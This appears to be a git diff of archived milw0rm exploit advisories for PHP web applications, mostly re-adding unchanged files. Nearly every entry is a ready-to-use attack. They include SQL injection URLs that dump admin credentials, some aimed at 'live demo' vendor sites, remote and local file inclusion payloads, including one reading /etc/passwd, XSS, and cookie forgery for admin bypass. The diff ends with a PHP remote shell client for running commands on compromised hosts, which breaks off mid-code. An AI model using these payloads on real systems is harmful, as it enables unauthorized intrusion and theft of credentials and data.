darkangel_g85[at]Yahoo[DoT]com = +# = +#========================================================= +# +# script : http://www.dreamlevels.com/dreampics.php +# +# DorK : powered by Dreampics Builder +# +########################################################## + +Exploit: + +www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users-- + + +L!VE DEMO: + +http://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users-- + + +Admin 
Login : + +/admin/ + +########################( Greetz )########################### +# # +# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke # +# # +# Iraqihack / FAHD / mos_chori / Silic0n # +# # +############################################################# + + Im IRAQi + +# milw0rm.com [2008-07-09] diff --git a/platforms/php/webapps/6035.txt b/platforms/php/webapps/6035.txt index 100619fda..62d0a71fd 100755 --- a/platforms/php/webapps/6035.txt +++ b/platforms/php/webapps/6035.txt 
@@ -1,50 +1,50 @@ -######################################################### -# -# dreamnews ( rss) Remote SQL Injection Vulnerability -#======================================================== -# Author: Hussin X = -# = -# Home : www.tryag.cc/cc = -# = -# email: darkangel_g85[at]Yahoo[DoT]com = -# = -#========================================================= -# -# script : http://dreamlevels.com/dreamnews.php -# -# DorK : N/A -# -########################################################## - -Exploit: - -www.[target].com/Script/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- - - -L!VE DEMO: - -http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- - - -column_name : - -user_password -user_login - - - -Admin Login : - -/admin/ - -########################( Greetz )########################### -# # -# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke # -# # -# Iraqihack / FAHD / mos_chori / Silic0n # -# # -############################################################# - - Im IRAQi - -# milw0rm.com [2008-07-10] +######################################################### +# +# dreamnews ( rss) Remote SQL Injection Vulnerability +#======================================================== +# Author: Hussin X = +# = +# Home : www.tryag.cc/cc = +# = +# email: darkangel_g85[at]Yahoo[DoT]com = +# = +#========================================================= +# +# script : http://dreamlevels.com/dreamnews.php +# +# DorK : N/A +# +########################################################## + +Exploit: + +www.[target].com/Script/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- + 
+ +L!VE DEMO: + +http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- + + +column_name : + +user_password +user_login + + + +Admin Login : + +/admin/ + +########################( Greetz )########################### +# # +# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke # +# # +# Iraqihack / FAHD / mos_chori / Silic0n # +# # +############################################################# + + Im IRAQi + +# milw0rm.com [2008-07-10] diff --git a/platforms/php/webapps/6036.txt b/platforms/php/webapps/6036.txt index da9981226..5edd7ff73 100755 --- a/platforms/php/webapps/6036.txt +++ b/platforms/php/webapps/6036.txt 
@@ -1,22 +1,22 @@ -###################################################################################################### - gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability -###################################################################################################### -[~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,| -[~] HOME : www.Real-Hack.net | )(_o/ \o_)( | -[~] Email : Ghost-r00t@Hotmail.com |/ /\ \| -[~] Script : gapicms v9.0.2 -[~] Download Script : http://heanet.dl.sourceforge.net/sourceforge/gapicms/gapicms_v9.0.2stable.tar.gz -############################# [ I love the Messenger of Allah Mohammad ] ############################# -[~] Error ( ktmlpro/includes/ktedit/toolbar.php ) -[~] Exploit : -http://xxxx/[path]/ktmlpro/includes/ktedit/toolbar.php?dirDepth=[Evil] -############################# [ I love the Messenger of Allah Mohammad ] ############################ -[~] Greetz : -PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr .. -Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ] -All Member Real Hack And All My Friends .. -###################################################################################################### - Real Hack Team ( R-H ) .. -###################################################################################################### - -# milw0rm.com [2008-07-10] +###################################################################################################### + gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability +###################################################################################################### +[~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. 
,| +[~] HOME : www.Real-Hack.net | )(_o/ \o_)( | +[~] Email : Ghost-r00t@Hotmail.com |/ /\ \| +[~] Script : gapicms v9.0.2 +[~] Download Script : http://heanet.dl.sourceforge.net/sourceforge/gapicms/gapicms_v9.0.2stable.tar.gz +############################# [ I love the Messenger of Allah Mohammad ] ############################# +[~] Error ( ktmlpro/includes/ktedit/toolbar.php ) +[~] Exploit : +http://xxxx/[path]/ktmlpro/includes/ktedit/toolbar.php?dirDepth=[Evil] +############################# [ I love the Messenger of Allah Mohammad ] ############################ +[~] Greetz : +PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr .. +Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ] +All Member Real Hack And All My Friends .. +###################################################################################################### + Real Hack Team ( R-H ) .. +###################################################################################################### + +# milw0rm.com [2008-07-10] diff --git a/platforms/php/webapps/6037.txt b/platforms/php/webapps/6037.txt index 04902a885..b579306ed 100755 --- a/platforms/php/webapps/6037.txt +++ b/platforms/php/webapps/6037.txt 
@@ -1,22 +1,22 @@ -######################################################### -# -# phpDatingClub Local File Include Vulnerability -#======================================================== -# = -# Author: Big Ben = -# = -#======================================================== -# -# script : http://www.w2b.ru/download/phpDatingClub.zip -# -# DorK : Powered by phpDatingClub -# -########################################################## -# -# Exploit: -# -# www.[target].com/Script/website.php?page=[LFI] -# -########################################################## - -# milw0rm.com [2008-07-10] +######################################################### +# +# phpDatingClub Local File Include Vulnerability +#======================================================== +# = +# Author: Big Ben = +# = +#======================================================== +# +# script : http://www.w2b.ru/download/phpDatingClub.zip +# +# DorK : Powered by phpDatingClub +# +########################################################## +# +# Exploit: +# +# www.[target].com/Script/website.php?page=[LFI] +# +########################################################## + +# milw0rm.com [2008-07-10] diff --git a/platforms/php/webapps/6040.txt b/platforms/php/webapps/6040.txt index 09e13beb9..d1d0bdc10 100755 --- a/platforms/php/webapps/6040.txt +++ b/platforms/php/webapps/6040.txt 
@@ -1,115 +1,115 @@ - ________________________________________ -| File Store PRO 3.2 Blind SQL Injection | -|________________________________________| - - -Download from: http://upoint.info/cgi/demo/fs/filestore.zip - -- Need admin rights: -/confirm.php: -[code] - -if(isset($_GET["folder"]) && $_GET["folder"]!="") { - $folder=$_GET["folder"]; -} else { - exit("Bad Request"); - } -if(isset($_GET["id"]) && $_GET["id"]!="") { - $id=$_GET["id"]; -} else { - exit("Bad Request"); - } - -// Validate all inputs -// Added by SepedaTua on June 01, 2006 - http://www.sepedatua.info/ -/********************** SepedaTua ****************************/ - -/* Fields: -$folder -$id -*/ -$search = array ('@]*?>.*?@si', - '@<[\/\!]*?[^<>]*?>@si', - '@([\r\n])[\s]+@', - '@&(quot|#34);@i', - '@&(amp|#38);@i', - '@&(lt|#60);@i', - '@&(gt|#62);@i', - '@&(nbsp|#160);@i', - '@&(iexcl|#161);@i', - '@&(cent|#162);@i', - '@&(pound|#163);@i', - '@&(copy|#169);@i', - '@&#(\d+);@e'); - -$replace = array ('', - '', - '\1', - '"', - '&', - '<', - '>', - ' ', - chr(161), - chr(162), - chr(163), - chr(169), - 'chr(\1)'); - -$ffolder = $folder; -$fid = $id; - -$folder = preg_replace($search, $replace, $folder); -$id = preg_replace($search, $replace, $id); - ------ - -$SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` "; -$SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`"; -$SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'"; -if(!$mysql->query($SQL)) -{ - exit($mysql->error); -} -if($mysql->num<=0) -{ - exit("Record not found"); -} -[/code] - -POC: -' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin -Site: http://site.xxx/confirm.php?folder=a&id=[SQL] - -- Don't need admin rights: -In /download.php: -[code] -if(!isset($_GET["sig"])) // 
direct download, no need to login -$MustLogin=1|2|4; -require_once("libs/header.php"); -if(!isset($_GET["sig"])) // direct download, no need to login -$userlevel=$CurUser->getlevel(); -$SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'"; -if(!$mysql->query($SQL)) -{ - exit($mysql->error); -} -[/code] - -POC: -' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin -Site: -http://site.xxx/download.php?id=[SQL] - -Needs magic_quotes_gpc=off. Vendor not contacted ! - --------------------------------------------------------------------- - -Site: http://rstcenter.com -Site: http://de-ce.net - -Good luck ! - --------------------------------------------------------------------- - -# milw0rm.com [2008-07-11] + ________________________________________ +| File Store PRO 3.2 Blind SQL Injection | +|________________________________________| + + +Download from: http://upoint.info/cgi/demo/fs/filestore.zip + +- Need admin rights: +/confirm.php: +[code] + +if(isset($_GET["folder"]) && $_GET["folder"]!="") { + $folder=$_GET["folder"]; +} else { + exit("Bad Request"); + } +if(isset($_GET["id"]) && $_GET["id"]!="") { + $id=$_GET["id"]; +} else { + exit("Bad Request"); + } + +// Validate all inputs +// Added by SepedaTua on June 01, 2006 - http://www.sepedatua.info/ +/********************** SepedaTua ****************************/ + +/* Fields: +$folder +$id +*/ +$search = array ('@]*?>.*?@si', + '@<[\/\!]*?[^<>]*?>@si', + '@([\r\n])[\s]+@', + '@&(quot|#34);@i', + '@&(amp|#38);@i', + '@&(lt|#60);@i', + '@&(gt|#62);@i', + '@&(nbsp|#160);@i', + '@&(iexcl|#161);@i', + '@&(cent|#162);@i', + '@&(pound|#163);@i', + '@&(copy|#169);@i', + '@&#(\d+);@e'); + +$replace = array ('', + '', + '\1', + '"', + '&', + '<', + '>', + ' ', + chr(161), + chr(162), + chr(163), + chr(169), + 'chr(\1)'); + +$ffolder = $folder; +$fid = $id; + +$folder = preg_replace($search, $replace, $folder); 
+$id = preg_replace($search, $replace, $id); + +----- + +$SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` "; +$SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`"; +$SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'"; +if(!$mysql->query($SQL)) +{ + exit($mysql->error); +} +if($mysql->num<=0) +{ + exit("Record not found"); +} +[/code] + +POC: +' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin +Site: http://site.xxx/confirm.php?folder=a&id=[SQL] + +- Don't need admin rights: +In /download.php: +[code] +if(!isset($_GET["sig"])) // direct download, no need to login +$MustLogin=1|2|4; +require_once("libs/header.php"); +if(!isset($_GET["sig"])) // direct download, no need to login +$userlevel=$CurUser->getlevel(); +$SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'"; +if(!$mysql->query($SQL)) +{ + exit($mysql->error); +} +[/code] + +POC: +' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin +Site: +http://site.xxx/download.php?id=[SQL] + +Needs magic_quotes_gpc=off. Vendor not contacted ! + +-------------------------------------------------------------------- + +Site: http://rstcenter.com +Site: http://de-ce.net + +Good luck ! + +-------------------------------------------------------------------- + +# milw0rm.com [2008-07-11] diff --git a/platforms/php/webapps/6041.txt b/platforms/php/webapps/6041.txt index 8792a553c..1f2f99048 100755 --- a/platforms/php/webapps/6041.txt +++ b/platforms/php/webapps/6041.txt 
@@ -1,43 +1,43 @@ -##################################################################### -# -# Facebook Newsroom Application Remote File Inclusion Vulnerability -# -##################################################################### -# -# Discovered by : Ciph3r -# -# -# MAIL : Ciph3r_blackhat@yahoo.com -# -# -# SP tanx4: Iranian hacker & Kurdish security TEAM -# -# sp TANX2: milw0rm.com & google.com & sourceforge.net -# -# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515 -# -# class : remote -# -# risk : high -# -# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d -####################################################################### -# -# C0de : -# -# -# require_once ($path.'/classes/feedStories.class.php'); -# -# -####################################################################### - - EXPLOIT : - - - - www.[Target].com/path/includes/home.php?path=[r57.txt?] - - -####################################################################### - -# milw0rm.com [2008-07-11] +##################################################################### +# +# Facebook Newsroom Application Remote File Inclusion Vulnerability +# +##################################################################### +# +# Discovered by : Ciph3r +# +# +# MAIL : Ciph3r_blackhat@yahoo.com +# +# +# SP tanx4: Iranian hacker & Kurdish security TEAM +# +# sp TANX2: milw0rm.com & google.com & sourceforge.net +# +# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515 +# +# class : remote +# +# risk : high +# +# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d +####################################################################### +# +# C0de : +# +# +# require_once ($path.'/classes/feedStories.class.php'); +# +# +####################################################################### + + EXPLOIT : + + + + www.[Target].com/path/includes/home.php?path=[r57.txt?] 
+ + +####################################################################### + +# milw0rm.com [2008-07-11] diff --git a/platforms/php/webapps/6042.txt b/platforms/php/webapps/6042.txt index 870be1cf1..40659a240 100755 --- a/platforms/php/webapps/6042.txt +++ b/platforms/php/webapps/6042.txt @@ -1,22 +1,22 @@ -/* - - Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities - ---------------------------------------------------------- - By StAkeR[at]hotmail[dot]it - http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip - ---------------------------------------------------------- - - 1- PHPInfo Disclosure - - index.php?categup=isset - - 2- Local File Inclusion (LFI) (MQ Off) - - index.php?c=../../../&a=etc/passwd%00 - - 3- Cross Site Scripting (XSS) - - index.php?c=wikiwizi&a=recherche&s= - - - -*/ - -# milw0rm.com [2008-10-20] +/* + + Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities + ---------------------------------------------------------- + By StAkeR[at]hotmail[dot]it + http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip + ---------------------------------------------------------- + + 1- PHPInfo Disclosure + - index.php?categup=isset + + 2- Local File Inclusion (LFI) (MQ Off) + - index.php?c=../../../&a=etc/passwd%00 + + 3- Cross Site Scripting (XSS) + - index.php?c=wikiwizi&a=recherche&s= + + + +*/ + +# milw0rm.com [2008-10-20] diff --git a/platforms/php/webapps/6044.txt b/platforms/php/webapps/6044.txt index e8eb53156..76612c2a4 100755 --- a/platforms/php/webapps/6044.txt +++ b/platforms/php/webapps/6044.txt 
@@ -1,47 +1,47 @@ -################################################################# -# -# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability -# -#======================================================== -# = -# Author: Hussin X = -# = -# Home : www.tryag.cc/cc -# = -# email: darkangel_g85[at]Yahoo[DoT]com = -# = -# = -#======================================================== -# -# script : http://e-topbiz.com/oprema/pages/millionpixels3.php -# -# DorK : inurl: "tops_top.php? id_cat =" -################################################################# - -Exploit: - - -www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/* - - - - -L!VE DEMO: - - -http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/* - - - - -########################( Greetz )########################### -# # -# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke # -# # -# Iraqihack / FAHD / mos_chori / Silic0n # -# # -############################################################# - - Im IRAQi - -# milw0rm.com [2008-07-11] +################################################################# +# +# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability +# +#======================================================== +# = +# Author: Hussin X = +# = +# Home : www.tryag.cc/cc +# = +# email: darkangel_g85[at]Yahoo[DoT]com = +# = +# = +#======================================================== +# +# script : http://e-topbiz.com/oprema/pages/millionpixels3.php +# +# DorK : inurl: "tops_top.php? 
id_cat =" +################################################################# + +Exploit: + + +www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/* + + + + +L!VE DEMO: + + +http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/* + + + + +########################( Greetz )########################### +# # +# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke # +# # +# Iraqihack / FAHD / mos_chori / Silic0n # +# # +############################################################# + + Im IRAQi + +# milw0rm.com [2008-07-11] diff --git a/platforms/php/webapps/6047.txt b/platforms/php/webapps/6047.txt index 41e2aa02c..055104479 100755 --- a/platforms/php/webapps/6047.txt +++ b/platforms/php/webapps/6047.txt 
@@ -1,17 +1,17 @@ -Author: Saime -Date: July 12, 2008 -Script: Maian Cart v1.1 Insecure Cookie Handling Vulnerability -URL: http://www.maianscriptworld.co.uk -Dork: Powered by Maian Cart v1.1 - -Description: -Maian Car v1.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mccart_cookie, -equals admin username(md5) - -Exploit: -javascript:document.cookie = "mccart_cookie=21232f297a57a5a743894a0e4a801fc3; path=/" - -Note: -The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin - -# milw0rm.com [2008-07-12] +Author: Saime +Date: July 12, 2008 +Script: Maian Cart v1.1 Insecure Cookie Handling Vulnerability +URL: http://www.maianscriptworld.co.uk +Dork: Powered by Maian Cart v1.1 + +Description: +Maian Car v1.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mccart_cookie, +equals admin username(md5) + +Exploit: +javascript:document.cookie = "mccart_cookie=21232f297a57a5a743894a0e4a801fc3; path=/" + +Note: +The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin + +# milw0rm.com [2008-07-12] diff --git a/platforms/php/webapps/6048.txt b/platforms/php/webapps/6048.txt index d87bd9c10..50d7beae4 100755 --- a/platforms/php/webapps/6048.txt +++ b/platforms/php/webapps/6048.txt 
@@ -1,16 +1,16 @@ -Author: Saime -Date: July 12, 2008 -Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability -URL: http://www.maianscriptworld.co.uk -Dork: Maian Events v2.0 Copyright © 2005-2008 Maian Script World. All Rights Reserved - -Description: -Maian Events v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mevents_admin_cookie, -equals admin username(md5) - -Exploit: -javascript:document.cookie = "mevents_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/" -Note: -The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin - -# milw0rm.com [2008-07-12] +Author: Saime +Date: July 12, 2008 +Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability +URL: http://www.maianscriptworld.co.uk +Dork: Maian Events v2.0 Copyright © 2005-2008 Maian Script World. All Rights Reserved + +Description: +Maian Events v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mevents_admin_cookie, +equals admin username(md5) + +Exploit: +javascript:document.cookie = "mevents_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/" +Note: +The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin + +# milw0rm.com [2008-07-12] diff --git a/platforms/php/webapps/6049.txt b/platforms/php/webapps/6049.txt index a451cb649..2021bfcee 100755 --- a/platforms/php/webapps/6049.txt +++ b/platforms/php/webapps/6049.txt 
@@ -1,17 +1,17 @@ -Author: Saime -Date: July 12, 2008 -Script: Maian Gallery v2.0 Insecure Cookie Handling Vulnerability -URL: http://www.maianscriptworld.co.uk -Dork: Maian Gallery v2.0 Copyright © 2006-2008 Maian Script World. All Rights Reserved. - -Description: -Maian Gallery v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mgallery_admin_cookie, -equals admin username(md5) - -Exploit: -javascript:document.cookie = "mgallery_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/mgallery/admin/" - -Note: -The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin - -# milw0rm.com [2008-07-12] +Author: Saime +Date: July 12, 2008 +Script: Maian Gallery v2.0 Insecure Cookie Handling Vulnerability +URL: http://www.maianscriptworld.co.uk +Dork: Maian Gallery v2.0 Copyright © 2006-2008 Maian Script World. All Rights Reserved. + +Description: +Maian Gallery v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mgallery_admin_cookie, +equals admin username(md5) + +Exploit: +javascript:document.cookie = "mgallery_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/mgallery/admin/" + +Note: +The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin + +# milw0rm.com [2008-07-12] diff --git a/platforms/php/webapps/6050.txt b/platforms/php/webapps/6050.txt index 29ba646bf..20ad81978 100755 --- a/platforms/php/webapps/6050.txt +++ b/platforms/php/webapps/6050.txt 
@@ -1,14 +1,14 @@ -Author: Saime -Date: July 12, 2008 -Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability -URL: http://www.maianscriptworld.co.uk -Dork: Powered by: Maian Greetings v2.1 - -Description: -Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie, -equals admin username. - -Exploit: -javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/" - -# milw0rm.com [2008-07-12] +Author: Saime +Date: July 12, 2008 +Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability +URL: http://www.maianscriptworld.co.uk +Dork: Powered by: Maian Greetings v2.1 + +Description: +Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie, +equals admin username. + +Exploit: +javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/" + +# milw0rm.com [2008-07-12] diff --git a/platforms/php/webapps/6051.txt b/platforms/php/webapps/6051.txt index 08e5e9bda..52192b841 100755 --- a/platforms/php/webapps/6051.txt +++ b/platforms/php/webapps/6051.txt 
@@ -1,17 +1,17 @@ -Author: Saime -Date: July 12, 2008 -Script: Maian Music v1.0 Insecure Cookie Handling Vulnerability -URL: http://www.maianscriptworld.co.uk -Dork: Maian Music v1.0. Copyright © 2007-2008 Maian Script World. All Rights Reserved. - -Description: -Maian Music v1.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mmusic_cookie, -equals admin username.(md5) - -Exploit: -javascript:document.cookie = "mmusic_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/music/admin/" - -Note: -The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin - -# milw0rm.com [2008-07-12] +Author: Saime +Date: July 12, 2008 +Script: Maian Music v1.0 Insecure Cookie Handling Vulnerability +URL: http://www.maianscriptworld.co.uk +Dork: Maian Music v1.0. Copyright © 2007-2008 Maian Script World. All Rights Reserved. + +Description: +Maian Music v1.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mmusic_cookie, +equals admin username.(md5) + +Exploit: +javascript:document.cookie = "mmusic_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/music/admin/" + +Note: +The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin + +# milw0rm.com [2008-07-12] diff --git a/platforms/php/webapps/6053.php b/platforms/php/webapps/6053.php index be88fdd15..8f121123b 100755 --- a/platforms/php/webapps/6053.php +++ b/platforms/php/webapps/6053.php 
@@ -1,291 +1,291 @@ -#!/usr/bin/php -') ); - -$shell = new phpreter($url.'code/polls/titles.inc.php', '-:-:-(.*)-:-:-', 'cmd', array(), false); - -function get($url) -{ - $infos = parse_url($url); - $host = $infos['host']; - $port = isset($infos['port']) ? $infos['port'] : 80; - - $fp = fsockopen($host, $port, &$errno, &$errstr, 30); - - $req = "GET $url HTTP/1.1\r\n"; - $req .= "Host: $host\r\n"; - $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; - $req .= "Connection: close\r\n\r\n"; - - fputs($fp,$req); - fclose($fp); -} - -/* - * Copyright (c) real - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License - * as published by the Free Software Foundation; either version 2 - * of the License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. - * - * TITLE: PHPreter - * AUTHOR: Charles "real" F. - * VERSION: 1.0 - * LICENSE: GNU General Public License - * - * This is a really simple class with permits to exec SQL, PHP or CMD - * on a remote host using the HTTP "Shell" header. 
- * - * - * Sample code: - * [host][sql]# mode=cmd - * [host][cmd]# id - * uid=2176(u47170584) gid=600(ftpusers) - * - * [host][cmd]# mode=php - * [host][php]# echo phpversion(); - * 4.4.8 - * [host][php]# mode=sql - * [host][sql]# SELECT version(), user() - * -------------------------------------------------- - * version() | 5.0.51a-log - * user() | dbo225004932@74.208.16.148 - * -------------------------------------------------- - * - * [host][sql]# - * - */ - -class phpreter -{ - var $url; - var $host; - var $port; - var $page; - - var $mode; - - var $ssql; - - var $prompt; - var $phost; - - var $regex; - var $data; - - /** - * __construct() - * - * @param url The url of the remote shell. - * @param regexp The regex to catch cmd result. - * @param mode Mode: php, sql or cmd. - * @param sql An array with the file to include, - * and sql vars - * @param clear Determines if clear() is called - * on startup - */ - function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true) - { - $this->url = $url; - - $this->regex = '#'.$regexp.'#is'; - - # - # Set data - # - - $infos = parse_url($this->url); - $this->host = $infos['host']; - $this->port = isset($infos['port']) ? $infos['port'] : 80; - $this->page = $infos['path']; - unset($infos); - - # www.(site).com - $host_tmp = explode('.',$this->host); - $this->phost = $host_tmp[ count($host_tmp)-2 ]; - unset($host_tmp); - - # - # Set up MySQL connection string - # - if(!sizeof($sql)) - $this->ssql = ''; - elseif(sizeof($sql)==5) - { - $this->ssql = "include('$sql[0]');" - . "mysql_connect($sql[1], $sql[2], $sql[3]);" - . "mysql_select_db($sql[4]);"; - } - else - { - $this->ssql = "" - . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');" - . 
"mysql_select_db('$sql[3]');"; - } - - $this->setmode($mode); - - # - # Main Loop - # - - if($clear) $this->clear(); - print $this->prompt; - - while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) ) - { - # change mode - if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) - $this->setmode($array[3]); - - # clear data - elseif(preg_match('#^clear$#i',$cmd)) - $this->clear(); - - # else - else print $this->exec($cmd); - - print $this->prompt; - } - } - - /** - * clear() - * Just clears ouput, printing '\n'x50 - */ - function clear() - { - print str_repeat("\n", 50); - return 0; - } - - /** - * setmode() - * Set mode (PHP, CMD, SQL) - * You don't have to call it. - * use mode=[php|cmd|sql] instead, - * in the prompt. - */ - function setmode($newmode) - { - $this->mode = strtolower($newmode); - $this->prompt = '['.$this->phost.']['.$this->mode.']# '; - - switch($this->mode) - { - case 'cmd': - $this->data = 'system(\'\');'; - break; - case 'php': - $this->data = ''; - break; - case 'sql': - $this->data = $this->ssql - . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");' - . 'print str_repeat("-",50)."\n";' - . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))' - . '{' - . 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";' - . 'print str_repeat("-",50)."\n";' - . '}'; - break; - } - return $this->mode; - } - - /** - * exec() - * Execute any query and catch the result. - * You don't have to call it. - */ - function exec($cmd) - { - if(!strlen($this->data)) $shell = $cmd; - else $shell = str_replace('', addslashes($cmd), $this->data); - - $fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30); - - $req = "GET " . $this->page . " HTTP/1.1\r\n"; - $req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . 
